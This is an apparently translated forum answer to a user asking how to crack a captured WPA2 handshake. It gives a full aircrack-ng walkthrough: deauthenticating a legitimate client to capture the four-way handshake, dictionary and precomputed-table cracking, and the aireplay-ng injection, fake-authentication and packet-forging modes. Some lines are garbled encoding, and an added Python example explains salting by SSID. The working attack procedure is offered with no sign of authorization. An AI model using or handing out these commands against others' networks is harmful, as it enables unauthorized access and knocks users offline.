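I read some tutorials on a wireless forum and learned how to capture handshake packets, but I have just captured a WPA2 handshake and the bundled dictionary cannot crack it. Could an expert please help me crack it?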
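Detailed WPA cracking tutorial
Prerequisite for cracking WPA: there must be a legitimate wireless client.
How WPA cracking works:
It uses the Deauth authentication attack. In other words, the legitimate wireless client is forcibly disconnected from the AP. Once it has been dropped from the WLAN, the wireless client automatically tries to reconnect to the AP, and this reconnection generates traffic. airodump is then used to capture the four-way handshake between the wireless router and the wireless client, producing a cap file that contains the four-way handshake. A dictionary is then used for brute-force cracking.
1. Activate the wireless card and set it to work on channel 11
airmon-ng start wifi0 11
2. Capture the cap packets on channel 11 and save them as 123.cap
airodump-ng -w 123 -c 11 wifi0
The figure above shows that WPA encryption is in use and that there is one legitimate wireless client, 0016b69d10ad.
3. Run the Deauth authentication attack to forcibly break the connection between the legitimate wireless client and the AP, so that the client reconnects
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
Explanation: -0 selects the Deauthenticate attack mode and is followed by the number of times to send. Using -c is still recommended because it works better; it is followed by the MAC address of a legitimate, already connected client that was observed.
Note the red part of the figure above: -c is followed by the MAC address of the legitimate wireless client.
A Deauth attack often does not succeed on the first attempt, so it has to be repeated to make sure the capture succeeds (WPA cracking does not need to wait until the Data count reaches tens of thousands, because a single capture containing the WPA four-way handshake is enough). If the capture succeeds, the prompt shown in red in the figure below appears.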
Produced by Zhongwei of the China Wireless Forum
AnywhereWLAN!!
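At this point, typing dir shows the handshake file named 123.cap in the root directory.
Once you have the handshake file you can crack it directly with a dictionary.
First copy the dictionary generated with a dictionary tool under Windows (for example password.txt) into the root directory.
Double-click system on the BT3 desktop and the figure below appears.
The red item on the left of the figure is the root directory. Double-click the storage media marked in red and you will see the partitions of each of your hard disks. You can enter a disk partition, right-click and copy, then enter the root directory, right-click and paste. See the red part of the figure below.
At present WPA cracking still relies mainly on brute force and dictionaries. What brute-force and dictionary cracking have in common is "time, effort and luck", so sometimes you spend a lot of time and still cannot crack it. When that happens, I hope everyone can accept this harsh reality.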
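Cracking method 1: brute force directly on the cap packets
In terms of difficulty, WEP is very easy to crack: as long as you collect enough cap packets it can certainly be cracked. Cracking WPA requires a good password dictionary, and a complex WPA password may not be cracked even after several months.
Enter: aircrack-ng -z -b <ap mac> 123*.cap
123 is the file name of the handshake capture obtained earlier. The system automatically appends -01, -02 to the file name you entered (if there are too many packets, the system automatically splits them into several files and names them; you can check with ls). Entering 123* opens all cap files related to 123.
Common problem: 300,000 packets have been collected in step 2 and the password still cannot be cracked. The system may have automatically split the cap packets into several files. Cracking with only 123-01.cap may fail, so it is recommended to use 123*.cap to select all the cap files.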
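Cracking method 2: dictionary cracking
(1) Dictionary cracking directly in BT3
aircrack-ng -w password.txt -b <ap mac> 123.cap
Parameters: password.txt is the dictionary name, and 123.cap is the handshake capture obtained in step 2.
The WPA password was obtained in 1 minute 31 seconds, as shown in the figure below.
The figure above shows that cracking took 1 minute 31 seconds at a speed of 149.91K/S.
Note: this tutorial only describes the cracking process. I made a small 256K dictionary and added the password to it beforehand.
(2) You can also copy the CAP file containing the four-way handshake to the hard disk and crack it with a dictionary under Windows using WinAircrack.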
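As in the figure above, select WPA-PSK under Encryption type, and under capture files below it import the captured handshake file 123.cap.
Then select the WPA option, as in the figure below.
In the figure above, import the dictionary file password.txt under Dictionary file, then click Aircrack the key in the lower right corner.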
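The prompt in the figure below then appears.
In the figure above, select 1 and press Enter, and cracking starts. A successful crack looks like the figure below.
The figure above shows that cracking took 54 seconds at a speed of 251.73K/S (faster than under BT3).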
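(3) Building a WPA table with airolib for line-speed WPA cracking
Besides cracking directly with a dictionary, the other way to do WPA dictionary cracking is to use airolib to turn the dictionary into a WPA table and then crack with aircrack.
Building a WPA table means computing hash values with the same algorithm that WPA encryption uses, so that when cracking is needed these files are looked up directly for comparison and cracking efficiency improves greatly.
First, building the WPA table with airolib.
A WPA table is strongly specific to the ssid.
1. Before building the WPA table, prepare two files: ssid.txt, a file listing ssids, and the dictionary file password.txt. The figure below shows my files.
You can see two txt files: the ssid notepad file holds the list of ssids, to which you can add common ssids, and the password file after it is the dictionary file.
2. Copy ssid.txt, password.txt and the handshake capture 123.cap obtained above into the root directory for convenience. See the figure below.
3. Start building the WPA table with airolib-ng. The WPA table is saved under the name wpahash (same below).
Step 1, as in the figure below
airolib-ng wpa --import essid ssid.txt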
第äºæ¥ï¼å¦ä¸å¾
airolib-ng wpa --import passwd password.txt
第ä¸æ¥ï¼å¦ä¸å¾
airolib-ng wpa --clean all
第åæ¥ï¼å¦ä¸å¾
airolib-ng wpa --batch
注ï¼è¿ä¸æ¥è¦çå¾ä¹ ï¼è§åå ¸å¤§å°èå®ï¼æ256Kçåå ¸çäºæ15åéï¼
4. ç¨aircrackæ¥å©ç¨WPA tableè¿è¡ç ´è§£
Aircrack-ng âr wpahash 123.cap
éæ©1以åå°å¼å§ç ´è§£ã
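A successful crack looks like the figure below.
The figure above shows an elapsed time of 00:00:00, in any case no more than 1 second, at a speed of 42250.00K/S.
You have now seen three ways of cracking. With a plain dictionary, cracking with WinAircrack under Windows is faster than under BT3. Plain dictionary cracking produced the password in no more than 1 minute; cracking with the WPA table took less than a second, but building the WPA table took 15 minutes. Building a WPA table is very time-consuming, but if you build a WPA table that covers common ssids and a relatively large dictionary, the time spent on later cracking drops considerably. Of course there is no universal dictionary; if there were one, a WPA table built from it for common ssids would be an extremely large precomputed database.
Note: the cracker in the CAIN software on Windows can also be used for brute-force and dictionary cracking of WEP and WPA, but it is very slow and has no practical value compared with aircrack-ng.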
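The 6 attack modes of aireplay-ng in detail
-0 Deauthenticate: conflict mode
Forces an already connected legitimate client to disconnect from the router so that it reconnects. Authentication packets are obtained during the reconnection, which produces a valid ARP request.
If a client is connected to the router but nobody is using the network to generate valid data, then even -3 cannot produce a valid ARP request. In that case the -0 attack mode is needed alongside it, and the -3 attack is then activated immediately.
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
Parameters:
[-0]: conflict attack mode, followed by the number of times to send (if set to 0, the attack loops, disconnecting continuously, and the client cannot use the network normally)
[-a]: sets the MAC of the AP
[-c]: sets the MAC of a connected legitimate client. If -c is not set, all legitimate clients connected to the AP are disconnected.
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
Note: this attack mode requires that an authenticated legitimate client is connected to the router.
-1 fakeauth count: fake client connection
This mode fakes a client that connects to the AP.
This is the first step of cracking without clients: because there is no legitimately connected client, a fake client is needed to connect to the router.
For the AP to accept packets, your own card must be associated with the AP. Without association, the target AP ignores all packets sent from your card and no IVS data is produced. Only after the fake client has connected successfully with -1 can injection commands be sent, and only after the router has received them does it return data and thereby produce ARP packets.
aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h <my mac> wifi0
Parameters:
[-1]: fake client connection mode, followed by the delay
[-e]: sets the essid of the AP
[-a]: sets the MAC of the AP
[-h]: sets the card MAC of the fake client (that is, the MAC of your own card)
-2 Interactive: interactive mode
This attack mode combines three things in one: capturing packets, extracting data and sending attack packets.
1. This mode is mainly used for cracking without clients: first establish a fake client connection with -1, then send attack packets directly.
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
Parameters:
[-2]: interactive attack mode
[-p]: sets the information contained in the control frame (hexadecimal); the default is 0841
[-c]: sets the target MAC address
[-b]: sets the MAC address of the AP
[-h]: sets the card MAC of the fake client (that is, the MAC of your own card)
2. Extract packets and send injection packets
aireplay-ng -2 -r <file> -x 1024 wifi0
Packet-sending attack. Here -x 1024 limits the sending rate to keep the card from hanging; 1024 can be chosen.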
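-3 ARP-request: injection attack mode
This mode captures packets, analyses them and resends them.
This attack mode is very effective. It can use a legitimate client, or it can be combined with -1 to use a fake client with a virtual connection. With a legitimate client you usually need to wait a few minutes for the legitimate client and the AP to communicate; a small amount of data is enough to produce a valid ARP request, and only then can -3 mode inject successfully. If there is no communication at all and no ARP request can be obtained, this attack fails. If there has been no ARP request between the legitimate client and the AP for a long time, you can try using the -0 attack at the same time.
If there is no legitimate client, you can use -1 to establish a fake client with a virtual connection; authentication packets are obtained during the connection, which produces a valid ARP request. Then inject with -3 mode.
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
Parameters:
[-3]: ARP injection attack mode
[-b]: sets the MAC of the AP
[-h]: sets
[-x]: defines the number of packets sent per second, but no more than 1024; 512 is recommended (it can also be left undefined)
-4 Chopchop attack mode, used to obtain an xor file containing key data
This mode mainly obtains a usable xor file containing key data. It cannot be used to decrypt packets; instead it is used to produce a new packet so that we can inject.
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
Parameters:
-b: sets the MAC of the AP to be cracked
-h: sets the MAC of the fake virtual connection (that is, the MAC of your own card)
-5 fragment: fragmentation attack mode, used to obtain the PRGA (a file with the xor suffix containing the key)
This mode mainly obtains a usable PRGA. The PRGA here is not WEP key data and cannot be used to decrypt packets; instead it is used to produce a new packet so that we can inject. It works by making the target AP rebroadcast packets: when the AP rebroadcasts, a new IVS is produced, and that is what we use to crack.
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
[-5]: fragmentation attack mode
[-b]: sets the MAC of the AP
[-h]: sets the MAC of the fake virtual connection (that is, the MAC of your own card)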
Packetforge-ng: packet forging program
packetforge-ng <mode> <options>
Mode
[-0]: forge an ARP packet
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 -k 255.255.255.255 -l 255.255.255.255 -y <.xor file> -w mrarp
Parameters:
[-0]: fake ARP packet
[-a]: sets the MAC of the AP
[-h]: sets the MAC of the fake virtual connection (that is, your own MAC)
[-k] <ip[:port]>: sets the target file IP and port
[-l] <ip[:port]>: sets the source file IP and port
[-y] <file>: reads the PRGA from the xor file; followed by the name of the xor file
[-w]: sets the file name of the fake ARP packet
Aircrack-ng: main program for cracking WEP and WPA-PSK keys
aircrack-ng [option] <.cap/.ivs file>
Options
aircrack-ng -n 64 -b <ap mac> name-01.ivs
Parameters:
[-n]: sets the WEP key length (64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
Parameters:
[-x]: sets brute-force cracking mode
[-f]: sets the complexity; 1 for a WEP password, 2 for a WPA password
aircrack-ng -w password.txt ciw.cap
[-w]: sets dictionary cracking mode, followed by the dictionary file and then by the capture file we saved earlier that contains the captured WPA authentication.
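Collected common problems
Problem 1: when I start bt3, typing startx gives a black screen.
Answer: after entering the user name root and the password toor, type xconf. The screen goes black for a moment; when the prompt comes back, type startx to enter the window environment. If you really cannot get into the window environment, you can also type the cracking commands directly at the prompt, and use alt+f1 to open one shell, alt+f2 to open a second shell, alt+f3 to open a third, and so on. Use the PRINT SCREEN key to close a window.
Problem 2: when I open kismet in BT3, the window flashes and disappears.
Answer: first load the driver with ifconfig -a rausb0, then start monitoring on the card: airmon-ng start rausb0. Find /usr/local/etc/kismet.conf, open it and add the following line below channelsplit=true: source=rt2500,rausb0,monitor
Note: for the wusb54g v4 it must be rt2500, not the rt2570 shown when the driver loads.
Those with a 3945 should add source=ipw3945,eth0,IPW3945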
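Why the WPA table in the answer above is tied to the ssid, as an added example that is not part of the original answer: the WPA/WPA2-PSK master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, so precomputed values for one SSID say nothing about another. The SSID names, word list and guess rates below are constructed assumptions.

```python
import hashlib

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 with the SSID as
    salt, 4096 iterations, 32-byte output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def precompute(ssids, wordlist):
    """Per-SSID set of PMKs: the expensive work, repeated for every SSID."""
    return {s: {derive_pmk(w, s) for w in wordlist} for s in ssids}

def covered_by_table(table, ssid, passphrase):
    """True if a table built in advance already holds this network's PMK."""
    return derive_pmk(passphrase, ssid) in table.get(ssid, set())

def exhaustive_years(alphabet_size, length, guesses_per_second):
    """Years needed to try every passphrase of one shape at a given rate."""
    return alphabet_size ** length / guesses_per_second / (365 * 24 * 3600)

# Constructed sample data (not from the post).
COMMON_SSIDS = ["default", "linksys"]
WORDLIST = ["12345678", "password", "qwertyuiop"]

def demo():
    table = precompute(COMMON_SSIDS, WORDLIST)
    return {
        # Common SSID and a word-list passphrase: already in the table.
        "common_ssid_weak_pass": covered_by_table(table, "linksys", "password"),
        # Same passphrase, unique SSID: the salt differs, so the table misses.
        "unique_ssid_weak_pass": covered_by_table(table, "lab-7f3a-office", "password"),
        # Common SSID, passphrase outside any word list: the table misses.
        "common_ssid_strong_pass": covered_by_table(table, "linksys", "T9v#kq2LmZ!r8wXe"),
        # Assumed guess rates, for scale only.
        "years_8_digits": exhaustive_years(10, 8, 1000),
        "years_12_alnum": exhaustive_years(62, 12, 1_000_000),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

A unique SSID only removes the precomputation shortcut: a passphrase that appears in a word list is still found by a direct dictionary run, so passphrase length and randomness are the control that matters.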
Note: answers are recommended by other users and are for reference only.